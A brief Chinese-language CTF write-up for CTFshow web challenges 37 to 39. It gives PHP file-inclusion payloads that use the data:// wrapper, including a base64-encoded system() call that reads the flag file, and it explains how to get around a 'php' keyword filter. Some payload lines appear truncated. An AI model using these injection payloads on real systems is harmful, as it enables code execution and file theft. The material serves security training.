CTFSHOW web入门 web37-web39

web37

/?c=data://text/plain,

Web38

 

过滤了php所以上面那个不能用了,可以这样写

?c=data://text/plain,

这里是使用短标签=来代替php

或者使用base64编码一下

?c=data://text/plain;base64,PD89IHN5c3RlbSgidGFjIGZsYSoucCpwIik7Pz4=

web39

 

可以发现这里给传入的c加了个后缀,借用直接给的hint来说data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用

仍然使用上题的payload

?c=data://text/plain,

你可能感兴趣的:(大数据)